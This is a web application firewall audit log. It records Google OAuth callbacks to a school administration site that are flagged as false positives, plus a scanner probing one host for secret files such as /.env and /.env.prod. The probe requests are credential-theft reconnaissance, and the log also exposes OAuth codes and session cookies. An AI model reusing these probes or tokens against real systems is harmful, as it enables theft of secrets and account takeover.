[24/Jul/2025:08:36:59.065961 +0300] aIHGelooLYw4or2LgWL1sQAAAMM 5.82.140.145 37500 127.0.0.1 7081 --c3f0e72c-B-- GET /administration/index.php?code=4/0AVMBsJjxAm1XjLprI9wIhiE52YQ5ZoYSbYFIFDFev_ghNT76jg5Gt3j6q-Xe_CYqqBb95Q&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 5.82.140.145 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 accept-language: en-GB,en;q=0.5 accept-encoding: gzip, deflate, br, zstd referer: https://accounts.google.com/ upgrade-insecure-requests: 1 sec-fetch-dest: document sec-fetch-mode: navigate sec-fetch-site: cross-site sec-fetch-user: ?1 priority: u=0, i cookie: PHPSESSID=s7rkhekki8puhmrhrdd7udhis5 --c3f0e72c-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --c3f0e72c-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHGelooLYw4or2LgWL1sQAAAMM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753335418646453 419710 (- - -) Stopwatch2: 1753335418646453 419710; combined=4283, p1=563, p2=3347, p3=101, p4=72, p5=199, sr=197, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c3f0e72c-Z-- --7c63653d-A-- [24/Jul/2025:08:37:22.063611 +0300] aIHGkkdutIOpb_kg22gvGAAAAAo 195.178.110.161 44432 127.0.0.1 7081 --7c63653d-B-- GET /.env HTTP/1.0 Host: puriceutix.jac.group X-Real-IP: 195.178.110.161 X-Accel-Internal: /internal-nginx-static-location Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --7c63653d-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 24 May 2022 15:05:06 GMT ETag: "328-5dfc34833fcce" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --7c63653d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "puriceutix.jac.group"] [uri "/.env"] [unique_id "aIHGkkdutIOpb_kg22gvGAAAAAo"] Stopwatch: 1753335442058597 5107 (- - -) Stopwatch2: 1753335442058597 5107; combined=3007, p1=679, p2=2139, p3=0, p4=0, p5=189, sr=167, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7c63653d-Z-- --90f3891f-A-- [24/Jul/2025:08:37:22.525051 +0300] aIHGkkdutIOpb_kg22gvGwAAAAA 195.178.110.161 44480 127.0.0.1 7081 --90f3891f-B-- GET /.env.save HTTP/1.0 Host: puriceutix.jac.group X-Real-IP: 195.178.110.161 X-Accel-Internal: /internal-nginx-static-location Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --90f3891f-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 24 May 2022 15:05:06 GMT ETag: "328-5dfc34833fcce" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --90f3891f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "puriceutix.jac.group"] [uri "/.env.save"] [unique_id "aIHGkkdutIOpb_kg22gvGwAAAAA"] Stopwatch: 1753335442518990 6154 (- - -) Stopwatch2: 1753335442518990 6154; combined=3681, p1=706, p2=2877, p3=0, p4=0, p5=98, sr=173, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --90f3891f-Z-- --83e1ec7d-A-- [24/Jul/2025:08:37:22.815662 +0300] aIHGkkdutIOpb_kg22gvHQAAAA0 195.178.110.161 44496 127.0.0.1 7081 --83e1ec7d-B-- GET /.env.prod HTTP/1.0 Host: puriceutix.jac.group X-Real-IP: 195.178.110.161 X-Accel-Internal: /internal-nginx-static-location Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --83e1ec7d-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 24 May 2022 15:05:06 GMT ETag: "328-5dfc34833fcce" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --83e1ec7d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "puriceutix.jac.group"] [uri "/.env.prod"] [unique_id "aIHGkkdutIOpb_kg22gvHQAAAA0"] Stopwatch: 1753335442808692 7061 (- - -) Stopwatch2: 1753335442808692 7061; combined=4638, p1=2722, p2=1841, p3=0, p4=0, p5=75, sr=434, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --83e1ec7d-Z-- --382de32f-A-- [24/Jul/2025:08:37:23.198261 +0300] aIHGk0dutIOpb_kg22gvIAAAABQ 195.178.110.161 57238 127.0.0.1 7081 --382de32f-B-- GET /api/.env HTTP/1.0 Host: puriceutix.jac.group X-Real-IP: 195.178.110.161 X-Accel-Internal: /internal-nginx-static-location Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --382de32f-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 24 May 2022 15:05:06 GMT ETag: "328-5dfc34833fcce" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --382de32f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "puriceutix.jac.group"] [uri "/api/.env"] [unique_id "aIHGk0dutIOpb_kg22gvIAAAABQ"] Stopwatch: 1753335443193167 5182 (- - -) Stopwatch2: 1753335443193167 5182; combined=2835, p1=548, p2=2207, p3=0, p4=0, p5=80, sr=156, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --382de32f-Z-- --f2b03108-A-- [24/Jul/2025:08:37:23.719681 +0300] aIHGk0dutIOpb_kg22gvIgAAAAg 195.178.110.161 57262 127.0.0.1 7081 --f2b03108-B-- GET /dev/.env HTTP/1.0 Host: puriceutix.jac.group X-Real-IP: 195.178.110.161 X-Accel-Internal: /internal-nginx-static-location Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --f2b03108-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 24 May 2022 15:05:06 GMT ETag: "328-5dfc34833fcce" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --f2b03108-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "puriceutix.jac.group"] [uri "/dev/.env"] [unique_id "aIHGk0dutIOpb_kg22gvIgAAAAg"] Stopwatch: 1753335443714397 5399 (- - -) Stopwatch2: 1753335443714397 5399; combined=3011, p1=721, p2=2172, p3=0, p4=0, p5=118, sr=176, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f2b03108-Z-- --d58e1b0e-A-- [24/Jul/2025:08:37:29.798719 +0300] aIHGmUdutIOpb_kg22gvNgAAABY 212.28.242.186 57544 127.0.0.1 7081 --d58e1b0e-B-- GET /administration/index.php?code=4/0Adeu5BWJqp0VhuiwaNY5tIfRjaU_6zwyaG074BAPKoHkGkxup5c7VMiqllW_q4NRVOOSgA&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=1&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Microsoft Edge";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: none sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i --d58e1b0e-F-- HTTP/1.1 302 Moved Temporarily Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=881rmq1p4tnqcra79vuqjme1d4; path=/ Upgrade: h2,h2c Connection: Upgrade, close Location: https://www.jinansystem.com/login.php Content-Length: 0 Content-Type: text/html; charset=UTF-8 --d58e1b0e-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHGmUdutIOpb_kg22gvNgAAABY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753335449789696 9182 (- - -) Stopwatch2: 1753335449789696 9182; combined=5438, p1=820, p2=4134, p3=80, p4=33, p5=371, sr=286, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d58e1b0e-Z-- --580e606c-A-- [24/Jul/2025:08:37:42.932609 +0300] aIHGpkdutIOpb_kg22gvmgAAAAY 212.28.242.186 52736 127.0.0.1 7081 --580e606c-B-- GET /administration/index.php?code=4/0AVMBsJjKv04faN9Ju9K8SLuIvyyCextS7RXqNURxlaB9Kqmob6TLHCed7d1x5QnXq7wJmA&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=1&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Microsoft Edge";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=881rmq1p4tnqcra79vuqjme1d4 --580e606c-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --580e606c-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHGpkdutIOpb_kg22gvmgAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753335462538438 394493 (- - -) Stopwatch2: 1753335462538438 394493; combined=6280, p1=599, p2=5211, p3=176, p4=97, p5=196, sr=167, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --580e606c-Z-- --fbf57f6b-A-- [24/Jul/2025:08:38:59.893863 +0300] aIHG81ooLYw4or2LgWL3YwAAAMw 5.82.140.145 33236 127.0.0.1 7081 --fbf57f6b-B-- GET /administration/index.php?code=4/0AVMBsJjWpJgOTVQFBWMLVkiZvPqTxdu8YZPrW-ztQlLsKhlZVqBQuvmdFGDLtgtYKegbMQ&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 5.82.140.145 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Opera";v="119" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 OPR/119.0.0.0 (Edition Campaign 34) accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-GB,en-US;q=0.9,en;q=0.8,ar;q=0.7,hu;q=0.6,fr;q=0.5 priority: u=0, i cookie: PHPSESSID=o6679l27jspetdnihv2o8f7dp2 --fbf57f6b-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --fbf57f6b-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHG81ooLYw4or2LgWL3YwAAAMw"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753335539481747 412293 (- - -) Stopwatch2: 1753335539481747 412293; combined=5478, p1=661, p2=4412, p3=140, p4=126, p5=138, sr=146, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fbf57f6b-Z-- --eabb977e-A-- [24/Jul/2025:08:39:47.249185 +0300] aIHHIkdutIOpb_kg22g0dwAAAA4 212.28.242.186 49314 127.0.0.1 7081 --eabb977e-B-- GET /administration/index.php?code=4/0AVMBsJicCxcmZ597kCGMGit9IXoCaxjZGp64zdv5NIrYM_ZTwkl13kuJCImghSjmyGiABA&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=1&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9,ar;q=0.8 priority: u=0, i cookie: PHPSESSID=sqsemh12av2d8sbrpe98511au5 --eabb977e-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --eabb977e-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHHIkdutIOpb_kg22g0dwAAAA4"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753335586846962 402500 (- - -) Stopwatch2: 1753335586846962 402500; combined=4827, p1=688, p2=3795, p3=137, p4=68, p5=139, sr=176, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --eabb977e-Z-- --e2c6c97d-A-- [24/Jul/2025:08:41:29.965764 +0300] aIHHiUdutIOpb_kg22g4PwAAABc 141.105.87.197 60020 127.0.0.1 7081 --e2c6c97d-B-- GET /administration/index.php?code=4/0AVMBsJgLDjXRiDK0ruoZpWfA9sbNPTJJeW95iBjLFlL8jcJJ3ekzqitHX3k0osv9nkvyjA&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 141.105.87.197 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 accept-language: en-US,en;q=0.5 accept-encoding: gzip, deflate, br, zstd referer: https://accounts.google.com/ upgrade-insecure-requests: 1 sec-fetch-dest: document sec-fetch-mode: navigate sec-fetch-site: cross-site sec-fetch-user: ?1 priority: u=0, i cookie: PHPSESSID=3r2jh4bn825hjn7g3q1dlr3r02 --e2c6c97d-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache 